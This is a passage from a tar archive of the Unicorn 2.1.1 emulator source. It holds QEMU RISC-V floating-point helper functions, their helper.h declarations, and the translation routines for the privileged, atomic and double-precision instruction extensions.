helper_fnmadd_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float64_muladd(frs1, frs2, frs3, float_muladd_negate_c | float_muladd_negate_product, &env->fp_status); } uint64_t helper_fadd_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_add(frs1, frs2, &env->fp_status); } uint64_t helper_fsub_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_sub(frs1, frs2, &env->fp_status); } uint64_t helper_fmul_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_mul(frs1, frs2, &env->fp_status); } uint64_t helper_fdiv_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_div(frs1, frs2, &env->fp_status); } uint64_t helper_fmin_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_minnum(frs1, frs2, &env->fp_status); } uint64_t helper_fmax_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_maxnum(frs1, frs2, &env->fp_status); } uint64_t helper_fsqrt_s(CPURISCVState *env, uint64_t frs1) { return float32_sqrt(frs1, &env->fp_status); } target_ulong helper_fle_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_le(frs1, frs2, &env->fp_status); } target_ulong helper_flt_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_lt(frs1, frs2, &env->fp_status); } target_ulong helper_feq_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_eq_quiet(frs1, frs2, &env->fp_status); } target_ulong helper_fcvt_w_s(CPURISCVState *env, uint64_t frs1) { return float32_to_int32(frs1, &env->fp_status); } target_ulong helper_fcvt_wu_s(CPURISCVState *env, uint64_t frs1) { return (int32_t)float32_to_uint32(frs1, &env->fp_status); } #if defined(TARGET_RISCV64) uint64_t helper_fcvt_l_s(CPURISCVState *env, uint64_t frs1) { return float32_to_int64(frs1, &env->fp_status); } uint64_t helper_fcvt_lu_s(CPURISCVState *env, uint64_t frs1) { return float32_to_uint64(frs1, &env->fp_status); } #endif uint64_t helper_fcvt_s_w(CPURISCVState *env, target_ulong rs1) { return int32_to_float32((int32_t)rs1, &env->fp_status); } uint64_t helper_fcvt_s_wu(CPURISCVState *env, target_ulong rs1) { return uint32_to_float32((uint32_t)rs1, &env->fp_status); } #if defined(TARGET_RISCV64) uint64_t helper_fcvt_s_l(CPURISCVState *env, uint64_t rs1) { return int64_to_float32(rs1, &env->fp_status); } uint64_t helper_fcvt_s_lu(CPURISCVState *env, uint64_t rs1) { return uint64_to_float32(rs1, &env->fp_status); } #endif target_ulong helper_fclass_s(uint64_t frs1) { float32 f = frs1; bool sign = float32_is_neg(f); if (float32_is_infinity(f)) { return sign ? 1 << 0 : 1 << 7; } else if (float32_is_zero(f)) { return sign ? 1 << 3 : 1 << 4; } else if (float32_is_zero_or_denormal(f)) { return sign ? 1 << 2 : 1 << 5; } else if (float32_is_any_nan(f)) { float_status s = { 0 }; /* for snan_bit_is_one */ return float32_is_quiet_nan(f, &s) ? 1 << 9 : 1 << 8; } else { return sign ? 1 << 1 : 1 << 6; } } uint64_t helper_fadd_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_add(frs1, frs2, &env->fp_status); } uint64_t helper_fsub_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_sub(frs1, frs2, &env->fp_status); } uint64_t helper_fmul_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_mul(frs1, frs2, &env->fp_status); } uint64_t helper_fdiv_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_div(frs1, frs2, &env->fp_status); } uint64_t helper_fmin_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_minnum(frs1, frs2, &env->fp_status); } uint64_t helper_fmax_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_maxnum(frs1, frs2, &env->fp_status); } uint64_t helper_fcvt_s_d(CPURISCVState *env, uint64_t rs1) { return float64_to_float32(rs1, &env->fp_status); } uint64_t helper_fcvt_d_s(CPURISCVState *env, uint64_t rs1) { return float32_to_float64(rs1, &env->fp_status); } uint64_t helper_fsqrt_d(CPURISCVState *env, uint64_t frs1) { return float64_sqrt(frs1, &env->fp_status); } target_ulong helper_fle_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_le(frs1, frs2, &env->fp_status); } target_ulong helper_flt_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_lt(frs1, frs2, &env->fp_status); } target_ulong helper_feq_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_eq_quiet(frs1, frs2, &env->fp_status); } target_ulong helper_fcvt_w_d(CPURISCVState *env, uint64_t frs1) { return float64_to_int32(frs1, &env->fp_status); } target_ulong helper_fcvt_wu_d(CPURISCVState *env, uint64_t frs1) { return (int32_t)float64_to_uint32(frs1, &env->fp_status); } #if defined(TARGET_RISCV64) uint64_t helper_fcvt_l_d(CPURISCVState *env, uint64_t frs1) { return float64_to_int64(frs1, &env->fp_status); } uint64_t helper_fcvt_lu_d(CPURISCVState *env, uint64_t frs1) { return float64_to_uint64(frs1, &env->fp_status); } #endif uint64_t helper_fcvt_d_w(CPURISCVState *env, target_ulong rs1) { return int32_to_float64((int32_t)rs1, &env->fp_status); } uint64_t helper_fcvt_d_wu(CPURISCVState *env, target_ulong rs1) { return uint32_to_float64((uint32_t)rs1, &env->fp_status); } #if defined(TARGET_RISCV64) uint64_t helper_fcvt_d_l(CPURISCVState *env, uint64_t rs1) { return int64_to_float64(rs1, &env->fp_status); } uint64_t helper_fcvt_d_lu(CPURISCVState *env, uint64_t rs1) { return uint64_to_float64(rs1, &env->fp_status); } #endif target_ulong helper_fclass_d(uint64_t frs1) { float64 f = frs1; bool sign = float64_is_neg(f); if (float64_is_infinity(f)) { return sign ? 1 << 0 : 1 << 7; } else if (float64_is_zero(f)) { return sign ? 1 << 3 : 1 << 4; } else if (float64_is_zero_or_denormal(f)) { return sign ? 1 << 2 : 1 << 5; } else if (float64_is_any_nan(f)) { float_status s = { 0 }; /* for snan_bit_is_one */ return float64_is_quiet_nan(f, &s) ? 1 << 9 : 1 << 8; } else { return sign ? 1 << 1 : 1 << 6; } } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/helper.h������������������������������������������������������������0000664�0000000�0000000�00000007457�14675241067�0020234�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_1(uc_riscv_exit, void, env) /* Exceptions */ DEF_HELPER_2(raise_exception, noreturn, env, i32) /* Floating Point - rounding mode */ DEF_HELPER_FLAGS_2(set_rounding_mode, TCG_CALL_NO_WG, void, env, i32) /* Floating Point - fused */ DEF_HELPER_FLAGS_4(fmadd_s, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fmadd_d, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fmsub_s, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fmsub_d, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fnmsub_s, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fnmsub_d, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fnmadd_s, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fnmadd_d, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) /* Floating Point - Single Precision */ DEF_HELPER_FLAGS_3(fadd_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fsub_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmul_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fdiv_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmin_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmax_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_2(fsqrt_s, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_3(fle_s, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_3(flt_s, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_3(feq_s, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_2(fcvt_w_s, TCG_CALL_NO_RWG, tl, env, i64) DEF_HELPER_FLAGS_2(fcvt_wu_s, TCG_CALL_NO_RWG, tl, env, i64) #if defined(TARGET_RISCV64) DEF_HELPER_FLAGS_2(fcvt_l_s, TCG_CALL_NO_RWG, tl, env, i64) DEF_HELPER_FLAGS_2(fcvt_lu_s, TCG_CALL_NO_RWG, tl, env, i64) #endif DEF_HELPER_FLAGS_2(fcvt_s_w, TCG_CALL_NO_RWG, i64, env, tl) DEF_HELPER_FLAGS_2(fcvt_s_wu, TCG_CALL_NO_RWG, i64, env, tl) #if defined(TARGET_RISCV64) DEF_HELPER_FLAGS_2(fcvt_s_l, TCG_CALL_NO_RWG, i64, env, tl) DEF_HELPER_FLAGS_2(fcvt_s_lu, TCG_CALL_NO_RWG, i64, env, tl) #endif DEF_HELPER_FLAGS_1(fclass_s, TCG_CALL_NO_RWG_SE, tl, i64) /* Floating Point - Double Precision */ DEF_HELPER_FLAGS_3(fadd_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fsub_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmul_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fdiv_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmin_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmax_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_2(fcvt_s_d, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_2(fcvt_d_s, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_2(fsqrt_d, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_3(fle_d, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_3(flt_d, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_3(feq_d, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_2(fcvt_w_d, TCG_CALL_NO_RWG, tl, env, i64) DEF_HELPER_FLAGS_2(fcvt_wu_d, TCG_CALL_NO_RWG, tl, env, i64) #if defined(TARGET_RISCV64) DEF_HELPER_FLAGS_2(fcvt_l_d, TCG_CALL_NO_RWG, tl, env, i64) DEF_HELPER_FLAGS_2(fcvt_lu_d, TCG_CALL_NO_RWG, tl, env, i64) #endif DEF_HELPER_FLAGS_2(fcvt_d_w, TCG_CALL_NO_RWG, i64, env, tl) DEF_HELPER_FLAGS_2(fcvt_d_wu, TCG_CALL_NO_RWG, i64, env, tl) #if defined(TARGET_RISCV64) DEF_HELPER_FLAGS_2(fcvt_d_l, TCG_CALL_NO_RWG, i64, env, tl) DEF_HELPER_FLAGS_2(fcvt_d_lu, TCG_CALL_NO_RWG, i64, env, tl) #endif DEF_HELPER_FLAGS_1(fclass_d, TCG_CALL_NO_RWG_SE, tl, i64) /* Special functions */ DEF_HELPER_3(csrrw, tl, env, tl, tl) DEF_HELPER_4(csrrs, tl, env, tl, tl, tl) DEF_HELPER_4(csrrc, tl, env, tl, tl, tl) DEF_HELPER_2(sret, tl, env, tl) DEF_HELPER_2(mret, tl, env, tl) DEF_HELPER_1(wfi, void, env) DEF_HELPER_1(tlb_flush, void, env) �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/���������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0020745�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_privileged.inc.c�����������������������������������0000664�0000000�0000000�00000010056�14675241067�0025224�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V translation routines for the RISC-V privileged instructions. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ static bool trans_ecall(DisasContext *ctx, arg_ecall *a) { /* always generates U-level ECALL, fixed in do_interrupt handler */ generate_exception(ctx, RISCV_EXCP_U_ECALL); exit_tb(ctx); /* no chaining */ ctx->base.is_jmp = DISAS_NORETURN; return true; } static bool trans_ebreak(DisasContext *ctx, arg_ebreak *a) { // ignore this instruction generate_exception(ctx, RISCV_EXCP_BREAKPOINT); exit_tb(ctx); /* no chaining */ ctx->base.is_jmp = DISAS_NORETURN; return true; } static bool trans_uret(DisasContext *ctx, arg_uret *a) { return false; } static bool trans_sret(DisasContext *ctx, arg_sret *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); if (has_ext(ctx, RVS)) { gen_helper_sret(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_env, tcg_ctx->cpu_pc); exit_tb(ctx); /* no chaining */ ctx->base.is_jmp = DISAS_NORETURN; } else { return false; } return true; } static bool trans_mret(DisasContext *ctx, arg_mret *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->base.pc_next); gen_helper_mret(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->cpu_env, tcg_ctx->cpu_pc); exit_tb(ctx); /* no chaining */ ctx->base.is_jmp = DISAS_NORETURN; return true; } static bool trans_wfi(DisasContext *ctx, arg_wfi *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, ctx->pc_succ_insn); gen_helper_wfi(tcg_ctx, tcg_ctx->cpu_env); return true; } static bool trans_sfence_vma(DisasContext *ctx, arg_sfence_vma *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->priv_ver >= PRIV_VERSION_1_10_0) { gen_helper_tlb_flush(tcg_ctx, tcg_ctx->cpu_env); return true; } return false; } static bool trans_sfence_vm(DisasContext *ctx, arg_sfence_vm *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->priv_ver <= PRIV_VERSION_1_09_1) { gen_helper_tlb_flush(tcg_ctx, tcg_ctx->cpu_env); return true; } return false; } static bool trans_hfence_gvma(DisasContext *ctx, arg_sfence_vma *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->priv_ver >= PRIV_VERSION_1_10_0 && has_ext(ctx, RVH)) { /* Hpervisor extensions exist */ /* * if (env->priv == PRV_M || * (env->priv == PRV_S && * !riscv_cpu_virt_enabled(env) && * get_field(ctx->mstatus_fs, MSTATUS_TVM))) { */ gen_helper_tlb_flush(tcg_ctx, tcg_ctx->cpu_env); return true; /* } */ } return false; } static bool trans_hfence_bvma(DisasContext *ctx, arg_sfence_vma *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->priv_ver >= PRIV_VERSION_1_10_0 && has_ext(ctx, RVH)) { /* Hpervisor extensions exist */ /* * if (env->priv == PRV_M || * (env->priv == PRV_S && * !riscv_cpu_virt_enabled(env) && * get_field(ctx->mstatus_fs, MSTATUS_TVM))) { */ gen_helper_tlb_flush(tcg_ctx, tcg_ctx->cpu_env); return true; /* } */ } return false; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rva.inc.c������������������������������������������0000664�0000000�0000000�00000015612�14675241067�0023665�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V translation routines for the RV64A Standard Extension. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ static inline bool gen_lr(DisasContext *ctx, arg_atomic *a, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv src1 = tcg_temp_new(tcg_ctx); /* Put addr in load_res, data in load_val. */ gen_get_gpr(tcg_ctx, src1, a->rs1); if (a->rl) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_STRL); } tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->load_val, src1, ctx->mem_idx, mop); if (a->aq) { tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_LDAQ); } tcg_gen_mov_tl(tcg_ctx, tcg_ctx->load_res, src1); gen_set_gpr(tcg_ctx, a->rd, tcg_ctx->load_val); tcg_temp_free(tcg_ctx, src1); return true; } static inline bool gen_sc(DisasContext *ctx, arg_atomic *a, MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv src1 = tcg_temp_new(tcg_ctx); TCGv src2 = tcg_temp_new(tcg_ctx); TCGv dat = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); gen_get_gpr(tcg_ctx, src1, a->rs1); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->load_res, src1, l1); gen_get_gpr(tcg_ctx, src2, a->rs2); /* * Note that the TCG atomic primitives are SC, * so we can ignore AQ/RL along this path. */ tcg_gen_atomic_cmpxchg_tl(tcg_ctx, src1, tcg_ctx->load_res, tcg_ctx->load_val, src2, ctx->mem_idx, mop); tcg_gen_setcond_tl(tcg_ctx, TCG_COND_NE, dat, src1, tcg_ctx->load_val); gen_set_gpr(tcg_ctx, a->rd, dat); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); /* * Address comparison failure. However, we still need to * provide the memory barrier implied by AQ/RL. */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL + a->aq * TCG_BAR_LDAQ + a->rl * TCG_BAR_STRL); tcg_gen_movi_tl(tcg_ctx, dat, 1); gen_set_gpr(tcg_ctx, a->rd, dat); gen_set_label(tcg_ctx, l2); /* * Clear the load reservation, since an SC must fail if there is * an SC to any address, in between an LR and SC pair. */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->load_res, -1); tcg_temp_free(tcg_ctx, dat); tcg_temp_free(tcg_ctx, src1); tcg_temp_free(tcg_ctx, src2); return true; } static bool gen_amo(DisasContext *ctx, arg_atomic *a, void(*func)(TCGContext *, TCGv, TCGv, TCGv, TCGArg, MemOp), MemOp mop) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv src1 = tcg_temp_new(tcg_ctx); TCGv src2 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, src1, a->rs1); gen_get_gpr(tcg_ctx, src2, a->rs2); (*func)(tcg_ctx, src2, src1, src2, ctx->mem_idx, mop); gen_set_gpr(tcg_ctx, a->rd, src2); tcg_temp_free(tcg_ctx, src1); tcg_temp_free(tcg_ctx, src2); return true; } static bool trans_lr_w(DisasContext *ctx, arg_lr_w *a) { REQUIRE_EXT(ctx, RVA); return gen_lr(ctx, a, (MO_ALIGN | MO_TESL)); } static bool trans_sc_w(DisasContext *ctx, arg_sc_w *a) { REQUIRE_EXT(ctx, RVA); return gen_sc(ctx, a, (MO_ALIGN | MO_TESL)); } static bool trans_amoswap_w(DisasContext *ctx, arg_amoswap_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_xchg_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amoadd_w(DisasContext *ctx, arg_amoadd_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_add_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amoxor_w(DisasContext *ctx, arg_amoxor_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_xor_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amoand_w(DisasContext *ctx, arg_amoand_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_and_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amoor_w(DisasContext *ctx, arg_amoor_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_or_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amomin_w(DisasContext *ctx, arg_amomin_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_smin_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amomax_w(DisasContext *ctx, arg_amomax_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_smax_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amominu_w(DisasContext *ctx, arg_amominu_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_umin_tl, (MO_ALIGN | MO_TESL)); } static bool trans_amomaxu_w(DisasContext *ctx, arg_amomaxu_w *a) { REQUIRE_EXT(ctx, RVA); return gen_amo(ctx, a, &tcg_gen_atomic_fetch_umax_tl, (MO_ALIGN | MO_TESL)); } #ifdef TARGET_RISCV64 static bool trans_lr_d(DisasContext *ctx, arg_lr_d *a) { return gen_lr(ctx, a, MO_ALIGN | MO_TEQ); } static bool trans_sc_d(DisasContext *ctx, arg_sc_d *a) { return gen_sc(ctx, a, (MO_ALIGN | MO_TEQ)); } static bool trans_amoswap_d(DisasContext *ctx, arg_amoswap_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_xchg_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amoadd_d(DisasContext *ctx, arg_amoadd_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_add_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amoxor_d(DisasContext *ctx, arg_amoxor_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_xor_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amoand_d(DisasContext *ctx, arg_amoand_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_and_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amoor_d(DisasContext *ctx, arg_amoor_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_or_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amomin_d(DisasContext *ctx, arg_amomin_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_smin_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amomax_d(DisasContext *ctx, arg_amomax_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_smax_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amominu_d(DisasContext *ctx, arg_amominu_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_umin_tl, (MO_ALIGN | MO_TEQ)); } static bool trans_amomaxu_d(DisasContext *ctx, arg_amomaxu_d *a) { return gen_amo(ctx, a, &tcg_gen_atomic_fetch_umax_tl, (MO_ALIGN | MO_TEQ)); } #endif ����������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rvd.inc.c������������������������������������������0000664�0000000�0000000�00000032262�14675241067�0023670�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V translation routines for the RV64D Standard Extension. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ static bool trans_fld(DisasContext *ctx, arg_fld *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0, ctx->mem_idx, MO_TEQ); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fsd(DisasContext *ctx, arg_fsd *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rs2], t0, ctx->mem_idx, MO_TEQ); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmadd_d(DisasContext *ctx, arg_fmadd_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmadd_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fmsub_d(DisasContext *ctx, arg_fmsub_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmsub_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fnmsub_d(DisasContext *ctx, arg_fnmsub_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fnmsub_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fnmadd_d(DisasContext *ctx, arg_fnmadd_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fnmadd_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fadd_d(DisasContext *ctx, arg_fadd_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fadd_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool 